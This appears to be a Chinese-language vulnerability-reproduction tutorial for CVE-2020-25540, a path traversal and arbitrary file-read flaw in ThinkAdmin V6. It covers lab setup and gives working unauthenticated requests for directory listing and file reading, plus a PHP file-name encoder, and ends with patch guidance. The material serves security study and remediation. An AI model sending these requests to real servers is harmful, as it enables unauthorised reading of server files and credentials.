您好,登錄后才能下訂單哦!
這篇文章給大家介紹如何實現ThinkAdmin的漏洞復現,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。
ThinkAdmin是一套基于ThinkPHP框架的通用后臺管理系統,ThinkAdmin 非常適用快速二次開發,默認集成 微信開發組件,支持微信服務號,微信支付,支付寶支付,阿里云OSS存儲,七牛云存儲,本地服務器存儲。,ThinkAdmin的權限管理基于標準RBAC簡化而來,去除了繁雜的節點管理,使得權限管理起來更簡單,具體包含節點管理、權限管理、菜單管理、用戶管理。
ThinkAdmin V6版本存在路徑遍歷漏洞。該漏洞主要是因為api中存在危險函數,且未作任何限制。未作任何認證可以直接調用api中此兩危險函數。攻擊者可利用該漏洞通過請求編碼參數任意讀取遠程服務器上的文件。
ThinkAdmin版本小于 ≤ 2020.08.03.01
CVE-2020-25540
ThinkAdmin 目錄遍歷/文件讀取漏洞
phpstudy2018+ThinkAdmin v6.0
Composer命令
1)安裝Composer命令,phpstudy中PHP設置成7.1或以上版本,并把對應的文件夾放入環境變量path中
2)在phpstudy服務器中打開php.ini文件,找到extension=php_openssl.dll前面的分號去掉,意思是打開ssl擴展,目的是為了能在cmd命令中能進行訪問
3)安裝composer.phar,找到下載內容的地方,去下載當前最新版本的composer.phar,雙擊安裝,不用勾選
下載地址https://getcomposer.org/Composer-Setup.exe
4)配置環境變量后自動選擇了
然后一直下一步,安裝完成
5)安裝完成后在cmd命令行輸入composer查看是否安裝成功
6)設置阿里云 Composer 代理
由于國內訪問Composer比較慢,建議設置阿里云Composer鏡像,運行如下命令設置阿里云代理
composer config -g repo.packagist composer https://mirrors.aliyun.com/composer |
7)搜索下載ThinkAdminV6的漏洞版本到本地
8)進入ThinkAdmin目錄進行安裝
composer install
9)然后進config/database.php目錄下修改配置文件,需要創建一個數據庫
10)php進行運行 php think run
http://ip:8000打開頁面
0x05漏洞復現
1.目錄遍歷
1.1 使用burp抓取首頁的包,發送到Repeater模塊構造數據包獲取目錄
1.2 在Repeater模塊中把GET修改成POST,url修改成/admin.html?s=admin/api.Update/node,在下面輸入rules=%5b%22%2f%22%5d //編碼為url編碼 解碼為["/"]
1.3點擊”Send”發送,可以看到返回包中帶有目錄列表了
注:要是沒有返回列表可修改payload中的路徑,然后使用url編碼即可
2. 任意文件讀取
2.1 我們在根目錄下創建文件flag.txt,內容為flag{s4d6f54s}
2.2 在使用加密函數對flag.txt進行加密,使用php運行加密函數得到2u302p2v1a383c38文件名
<?phpfunction encode($content){list($chars, $length) = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);return $chars;}$content="flag.txt";echo encode($content);?> |
2.3 訪問下面鏈接即可讀取到flag.txt(讀其他文件同理)
http://127.0.0.1:8000/admin.html?s=admin/api.Update/get/encode/2u302p2v1a383c38
2.4 復制后面使用base64加密的一段字符串,解碼出來就是flag.txt里的內容
0x06修復方式
1.升級到2020.08.03.01之后的版本
2.使用官方的臨時修復方案
https://github.com/zoujingli/ThinkAdmin/issues/244
關于如何實現ThinkAdmin的漏洞復現就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。